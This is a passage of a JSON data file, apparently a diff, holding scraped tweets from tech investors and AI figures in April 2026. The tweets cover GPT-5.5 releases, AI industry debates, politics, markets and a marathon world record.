"nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://x.com/ylecun/status/2048293118781296734", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://x.com/jason/status/2048249992163242220", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://x.com/jason/status/2048247267182658004", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://x.com/jason/status/2048245718171648271", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://x.com/eladgil/status/2048230781739581745", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://x.com/sama/status/2048224374264885396", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://x.com/sama/status/2048165186482389253", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://x.com/sama/status/2048160448340767038", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://x.com/sama/status/2048160404376105179", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://x.com/jason/status/2048151434928017429", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://x.com/charliebilello/status/2048128721286992166", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://x.com/ylecun/status/2048118689258487857", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://x.com/jason/status/2048116521436590260", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://x.com/jason/status/2048116362766127514", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://x.com/jason/status/2048099001782985057", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://x.com/ylecun/status/2048069805807128734", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://x.com/sama/status/2048062261584077149", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://x.com/paulg/status/2048043843690561556", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett", + "url": "https://x.com/charliebilello/status/2048032027513864212", + "published_at": "2026-04-25T13:31:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://x.com/paulg/status/2048024967996993760", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://x.com/paulg/status/2048017824895909901", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://x.com/paulg/status/2048017345000415744", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://x.com/paulg/status/2047992864118894954", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://x.com/paulg/status/2047957234664030380", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://x.com/paulg/status/2047944827887591681", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://x.com/paulg/status/2047942555254288757", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://x.com/paulg/status/2047941243234107691", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://x.com/sama/status/2047823357635354814", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://x.com/HarryStebbings/status/2047792195868967172", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://x.com/sama/status/2047787124846653895", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://x.com/ylecun/status/2047780272297382384", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://x.com/paulg/status/2047761493274571036", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://x.com/ylecun/status/2047760455679246500", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://x.com/ylecun/status/2047733594064408894", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://x.com/ylecun/status/2047697898989572176", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://x.com/HarryStebbings/status/2047693043080261672", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://x.com/sama/status/2047683787828703289", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://x.com/ylecun/status/2047680485208531152", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://x.com/ylecun/status/2047676640059154653", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://x.com/DavidSacks/status/2047672359377588241", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://x.com/DavidSacks/status/2047671706660073767", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand 